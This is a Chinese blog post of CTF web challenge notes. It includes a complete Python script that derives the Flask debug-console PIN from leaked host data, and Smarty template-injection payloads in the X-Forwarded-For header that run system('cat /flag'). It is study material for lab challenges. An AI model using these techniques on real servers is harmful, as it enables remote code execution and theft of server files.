Web题记

已于 2024-03-04 20:31:27 修改
阅读量915 收藏 25
点赞数 25
文章标签: web安全
于 2024-03-04 20:30:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73867210/article/details/136410818
版权

Web801

提示说此题姿势为flask算pin:pin码是flask在开启debug模式下,进行代码调试模式所需的进入密码,需要正确的PIN码才能进入调试模式,可以理解为自带的webshell,大概了解了一下

probably_public_bits包含4个字段,分别为
username
modname
getattr(app, 'name', app.class.name)
getattr(mod, 'file', None)

其中username对应的值为当前主机的用户名
	linux可以查看/etc/passwd
	windows可以查看C:/Users目录
modname的值为'flask.app'
getattr(app, 'name', app.class.name)对应的值为'Flask'
getattr(mod, 'file', None)对应的值为app包的绝对路径

private_bits包含两个字段,分别为
str(uuid.getnode())
get_machine_id()

其中str(uuid.getnode())为网卡mac地址的十进制值
	在inux系统下得到存储位置为/sys/class/net/(对应网卡)/address 一般为eth0
	windows中cmd执行config /all查看
get_machine_id()的值为当前机器唯一的机器码
	对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id
	docker机则读取/proc/self/cgroup。
	windows的id在注册表中 (HKEY_LOCAL_MACHINE->SOFTWARE->Microsoft->Cryptography)

 要计算出pin则必须知道所有的要素,即

username:启动flask的用户名 (/etc/passwd 读取)

modname:默认值flask.app

appname:默认flask

moddir:可通过报错信息得到 flask库下app.py的绝对路径,一般为/usr/local/lib/python{版本号}/site-packages/flask/app.py,在开启了debug的情况下可以通过报错获取,需要注意的是,在python2中,这个值是app.pyc,在python3中才是app.py

uuidnode:读取/sys/class/net/eth0/address MAC地址十六进制转化为十进制 根据网卡名称自行更改

machine_id: /etc/machine-id和/proc/sys/kernel/random/boot_id只要读取到其中一个,然后拼接/proc/self/cgroup

 

 username=root

app.py路径:/usr/local/lib/python3.8/site-packages/flask/app.py

 Mac地址需要转10进制:

 

 machine_id:225374fa-04bc-4346-9f39-48fa82829ca9f9fa1f6efc177f00de54ef691152afa6313b5e55df54a96d1ff8d41201870185

跑PIN码:

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]
private_bits = [
    '2485377621777',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '225374fa-04bc-4346-9f39-48fa82829ca9f9fa1f6efc177f00de54ef691152afa6313b5e55df54a96d1ff8d41201870185'#  /proc/self/cgroup
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)

#MD5
import hashlib
from itertools import chain
probably_public_bits = [
     'root'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
     '2485377621777',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '225374fa-04bc-4346-9f39-48fa82829ca9f9fa1f6efc177f00de54ef691152afa6313b5e55df54a96d1ff8d41201870185'# get_machine_id(), /etc/machine-id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num
print(rv)

 访问/console

 Web802

无字母数字命令执行  P神文章

[CISCN 2019华东南]Web11

知识点:smarty ssti RCE
    Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令
    XFF头代表了HTTP的请求端真实的IP,通过修改XXF头可以实现伪造IP
 模板引擎:

是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前

SSTI(Server-Side Template Injection):服务器端模板注入

漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题

Smarty

是最流行的PHP模板语言之一,为不受信任的模板执行提供了安全模式。这会强制执行在 php 安全函数白名单中的函数,因此我们在模板中无法直接调用 php 中直接执行命令的函数(相当于存在了一个disable_function)

在构造payload前先看张图

 改图是用来测试是用的什么模板

 最下面可以看到使用了smarty模板,并且显示出了ip,ok啊,思路挺清晰了,通过XFF伪造,利用SSTI模板构造payload

现根据上图测试一下,执行成功

那就确定是存在ssti了,直接构造

X-Forwarded-For:{system('cat /flag')}

还有一种看别人的

Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,那么我们可以使用{php}{/php}标签来构造payload,但是本题会报错

 可以利用这个来看一下版本

X-Forwarded-For:{$smarty.version}

3.1.30已废除{php}标签 ,这也是为什么刚才会报错,虽然php标签不能用,但是还有个{if}标签。
Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}. 全部的PHP条件表达式和函数都可以在if内使用,如*||*,or,&&,and,is_array(), 等等

可以看到执行成功了,构造playload

X-Forwarded-For:{if system('cat /flag')}{/if}

或者

X-Forwarded-For:{if show_source('/flag')}{/if}

参考链接:[CISCN2019 华东南赛区]Web11 1-CSDN博客

orange-snow
关注
Web 题记
m0_73867210的博客
11-30 947
分析代码,和平时不一样,有一个点:如何从get()->__tostring(),tostring的触发条件是当一个类对象被当作字符串时触发,那么显然我们想触发tostring,需要利用die这个函数,但我们在调用die之前调用了miaomiao这个方法,将a进行了提前赋值,这个时候可以看到die()前面的一串:this->gao=$this->fei;然后还有check函数以及基础的传参trick需要绕过,去网上搜一搜绕过方式,备注:php会将所传参数中的不合法符号替换为“_”构造链子。
ctfshow web题记
m0_73867210的博客
03-01 964
看了这个有点懂了,因为将'过滤了所以我们需要用\'来代替',而要让这个语句永远为真则可以构造||1,后面的#也是为了注释掉最后面的\',将前面的语句闭合起来,这样就形成了'xxxx'||1,永为真。这个比较用的是强比较,会先判断两种字符串的类型是否相等,再比较值是否相等,后面的函数可参考上一题的用法,只不过这一题里面的base为0,可以用八进制或者十六进制绕过。sql语句这里也没学的咋好就看别人的解题步骤了,先用单引号闭合,发现没啥变化,然后用\,发现出现在了返回的语句中。常用于强制类型转换。
Web.xml详解
Away_summer的博客
10-23 266
转载自:http://blog.csdn.net/believejava/article/details/43229361 这篇文章主要是综合网上关于web.xml的一些介绍,看完自己对这个配置文件有了很直观的理解,以后会经常拿来阅读,怕找不到原文就转载过来了。希望对大家有所帮助,也欢迎大家一起讨论。 —题记 Web.xml详解: 1.web.xml加载过程(步骤) 首先简单讲一下,web.xml...
攻防世界web新手区题记-下
outman23的博客
03-14 111
weak-auth 进入场景,随便试了一个,出现如下提示 说明用户名为“admin",密码用了下字典,测试通过,通过burp抓包也可以, 然后得到flag simple-php 此题考查php语言的理解 大概意思为 a参数的要求 a必须等于0且a为真 b参数的要求 b不能为数字且b大于1234 在url后面加入指令就得到FLAG ...
攻防世界web新手区题记
outman23的博客
02-28 253
view source 先进入题目 得到一个空白网站 然后不能右键查看源码,再f12 得到flag cyberpeace{7485d039a7d75614ebd5b7469d2f539b} robots 这里百度了一下robots协议, robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它 [1] 。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robo
web前端学习书单
wuxy720
12-25 471
web前端学习书单
CTF题记—ctfshow&&BUU
m0re's blog
10-03 2757
web19 题目描述:密钥什么的,就不要放在前端了 打开题目是登录框,第一想法是去尝试了万能密码。但是没有成功。然后才回过头看题目描述是前端有密钥。所以就看源代码。 上面是加密方法,百度发现是前端AES加密。它会将用户输入的密码字符串进行加密。两种可行方法,第一种是解密,先百度,然后这样这样,再那样那样就解出来了。(没有使用这种)。第二种是抓包修改,绕过前端验证。将密钥修改为$p的字符串。发包得到flag web 7、8 题目描述:版本控制很重要,但不要部署到生产环境更重要。 版本信息部署到生产环境,两
Web.xml配置详解
Bruce_Up的博客
10-26 619
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/believejava/article/details/43229361 这篇文章主要是综合网上关于web.xml的一些介绍,希望对大家有所帮助,也欢迎大家一起讨论。 ---题记 Web.xml详解...
CTF题记——详谈两道Web
m0re's blog
11-02 1221
前言 最近学校也在招新,基本没什么时间做题,最近也很少发博客。就写几道题来充充数吧。 正文 fakebook 我的思路呢,只有一点沾边了,记一下现在的思考: 注册了一个username就找不到其他信息了,然后考虑了源码泄露。找了robots.txt,发现了一个user.php.bak,访问得到泄露的文件。是这样 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; p
javaweb--简单的login用户登录
刘向阳的博客
09-07 1538
简单jsp前后台交互实现登录 无数据库校验! login.jsp <%-- Created by IntelliJ IDEA. User: Administrator Date: 2021/9/7 0007 Time: 16:49 To change this template use File | Settings | File Templates. --%> <%@ page contentType="text/html;charset=UTF-8" languag
Spring3学习笔记题记
03-22
《Spring3学习笔记题记》 在IT领域,Spring框架是Java开发中不可或缺的一部分,尤其在企业级应用中,Spring以其强大的功能和灵活性备受青睐。本文将深入探讨Spring3版本的相关知识点,帮助开发者更好地理解和使用这...
南京邮电大学web题writeup(部分)
tmgt的博客
08-05 1750
*题记:* 第一次写writeup,不知道该什么写,因为本人是小白一个,所以写的是一些基础的题型,做题过程中也参考了一些资料以及一些大神的writeup,再次谨表谢意!接下来进入主题: (1)签到题: 链接:签到题 签到题一般都是最简单的,所以直接右键查看源代码发现flag。 ...
学习笔记-Spring Boot 开发 RESTful Web API(一)
热门推荐
天外来客
08-11 1万+
题记: 本篇是Spring Boot 开发学习系列中基础知识学习的一部分,为 RESTful Web API 相关基础知识,为实践操作奠定理论基础。 REST不是一个标准,而是一种软件应用架构风格。基于SOAP的Web服务采用RPC架构,如果说RPC是一种面向操作的架构风格,而REST则是一种面向资源的架构风格。 REST是目前业界更为推崇的构建新一代Web服务(或者Web API)的架构风...
网络安全:守护数字世界的坚固防线
最新发布
fj800j的专栏
11-14 194
首先,加强网络安全法律法规的制定和完善,为网络安全提供有力的法律保障。其次,提高网络安全技术水平,研发更加先进的安全防护产品和解决方案,以应对不断变化的网络威胁。此外,加强网络安全教育和宣传,提高公众的网络安全意识和防范能力,也是至关重要的。因此,加强网络安全防护,构建坚固的数字防线,已成为当务之急。同时,我们也需要加强国际合作,共同应对跨国网络犯罪和网络攻击,维护网络空间的和平与安全。让我们携手共进,共同守护这个数字世界的坚固防线,为构建一个安全、稳定、繁荣的网络空间贡献力量。
网络安全之SQL初步注入
blue_2021010615的博客
11-10 607
{"username":"hahah","password":123456,"time":"6546536435536"}类似于这种就是json串,常见于前后端分离项目,用于不同语言进行调用数据。查询1的时候,会展示username=1的用户数据,可以测试是否有注入点(闭合单引号并构造永真条件。用户输入的数据会被替换到SQL语句中的$name位置。此时应该想到XX型,去闭合括号尝试。利用burpsuilte抓包。闭合引号的同时还需要闭合括号。平台使用pikachu。此处有注入点,为XX型。
【网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 450
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
关于网络安全里蜜罐的详细介绍
2401_88326437的博客
11-14 1053
另一方面,高交互性蜜罐旨在使黑客在蜜罐内花费尽可能多的时间,从而提供有关他们的意图和目标以及他们正在利用的漏洞和所用作案手法的大量信息。将两种类型结合使用,可以通过添加有关高交互蜜罐的意图、通信和漏洞利用的信息来优化有关低交互蜜罐的威胁类型的基本信息。它模仿黑客的目标,利用黑客的入侵企图来获取网络犯罪分子的信息以及他们的行动方式,或者将他们从其他目标上引开。蜜罐的一个定义来自间谍世界,玛塔哈里 (Mata Hari) 式的间谍将恋爱关系用作窃取秘密的方式,被描述为设置“美人计”或“蜜罐”。
【网络安全 | 身份授权】一文讲清OAuth
等风来
11-11 104
(第三方应用程序):简称“客户端”(client),指的是需要访问资源的外部应用。(HTTP 服务提供商):简称“服务提供商”,指的是托管用户资源的服务。(资源所有者):简称“用户”,即拥有资源的个体或实体,需要授权客户端访问自己的资源。User Agent(用户代理):指用户用来访问服务的工具,通常指浏览器。(认证服务器):服务提供商专门用于处理认证和授权请求的服务器,负责生成授权凭证和访问令牌。(资源服务器):存放用户资源的服务器,通常和认证服务器同属服务提供商,但可以是不同的服务器。
网络安全---安全见闻2
久恙502的博客
11-11 699
拓宽视野不仅能够丰富我们的知识体系,也是自我提升和深造学习的重要途径!!!
男女,由朋友到恋人到夫妻。写一篇情感题记
09-23
### 回答1: 男女之间的爱情,源自朋友之间的善良,升华为恋人相互的珍重,最终演变成夫妻之间真挚的爱情。无论是从朋友到恋人,还是从恋人到夫妻,它们都有着共同的特点:坚定的信任、坚实的依赖、深沉的爱恋。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值